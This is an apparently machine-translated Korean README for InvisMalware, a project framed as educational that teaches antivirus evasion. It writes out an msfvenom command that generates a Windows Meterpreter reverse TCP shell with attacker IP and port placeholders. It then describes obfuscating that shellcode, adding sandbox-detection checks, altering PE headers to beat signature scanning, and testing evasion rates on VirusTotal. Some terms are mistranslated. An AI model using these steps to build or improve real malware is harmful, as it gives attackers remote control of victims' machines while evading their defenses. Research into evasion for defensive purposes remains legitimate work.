InvisMalware

1. 소개
2. 특징
3. 설치
4. 용법
5. 실험 방법론
6. 테스트
7. 기여
8. 특허

Invismalware는 안티 바이러스 탐지를 우회하는 고급 맬웨어 회피 기술을 보여주기 위해 설계된 프로젝트입니다. 이 연구 중심의 맬웨어 실험은 정적 및 동적 맬웨어 탐지를 피하기 위해 코드 수정 및 방지 박스 전략과 같은 난독 화 방법을 활용하는 데 중점을 둡니다.

이 프로젝트는 악의적 인 행위자들이 사용하는 회피 기술로부터 학습함으로써 현대 악성 코드 방어 전략에 대한 통찰력을 제공하기위한 교육 목적으로 만 사용됩니다.

• 쉘 코드 생성 : MSFVenom을 사용하여 사용자 정의 리버스 TCP 쉘 페이로드를 만듭니다.
• 코드 난독 화 : NOPS, PE 헤더 조작 등을 추가하여 안티 바이러스 감지를 피하려면 맬웨어 코드를 수정하십시오.
• 항 동적 분석 : 오디오 드라이버 및 USB 장치 존재와 같은 샌드 박스 환경을 감지하기위한 검사를 포함합니다.
• PE 헤더 조작 : 시그니처 기반 감지를 피하기 위해 휴대용 실행 파일 (PE) 헤더를 조정하여 맬웨어를 위장하십시오.
• 회피율 계산 : 다양한 안티 바이러스 엔진의 결과를 비교하여 회피 기술의 효과를 측정합니다.

시작하려면 저장소를 복제하고 필요한 종속성을 설치하십시오.

• 파이썬 3.x
• virtualbox/vmware (가상 환경에서의 테스트 용)
• Metasploit 프레임 워크 (Shellcode 생성)
• PE-BEAR (PE 헤더 조작 용)

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

MSFVENOM을 사용하여 역 TCP ShellCode를 생성하십시오.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

evilexp.c 파일을 편집하여 코드를 난독 화하고 탐지를 피하십시오.

안전하고 고립 된 가상 머신에 맬웨어를 배치하여 동작을 테스트하고 탐지율을 측정하십시오.

여러 안티 바이러스 엔진에서 회피율을 평가하려면 맬웨어를 virustotal에 업로드하십시오.

이 프로젝트는 맬웨어 회피를 달성하기 위해 4 단계 방법론을 따릅니다.

1. 쉘 코드 생성 : 기준선 리버스 코드를 만듭니다.
2. 코드 수정 : 쉘 코드를 난독 화하여 감지를 피하십시오.
3. 동기 방지 분석 : 동적 분석 도구를 우회하기 위해 샌드 박스 감지를 추가하십시오.
4. PE 헤더 수정 : PE 헤더를 변경하여 맬웨어 서명을 추가로 난독 화하십시오.

Kaspersky , Windows Defender 또는 Bitdefender 와 같은 바이러스 백신 소프트웨어가 장착 된 가상 머신에서 맬웨어를 실행하십시오.

수정 된 맬웨어를 Virustotal 에 업로드하고 얼마나 많은 안티 바이러스 엔진이 성공적으로 감지하는지 확인하십시오.

우리는 프로젝트를 개선하기위한 기여를 환영합니다. 기여하고 싶다면 :

1. 저장소를 포크하십시오.
2. 기능 또는 버그 수정에 대한 새 지점을 만듭니다.
3. 변경 사항에 대한 자세한 정보로 풀 요청을 제출하십시오.

이 프로젝트는 MIT 라이센스에 따라 라이센스가 부여됩니다. 자세한 내용은 라이센스 파일을 참조하십시오.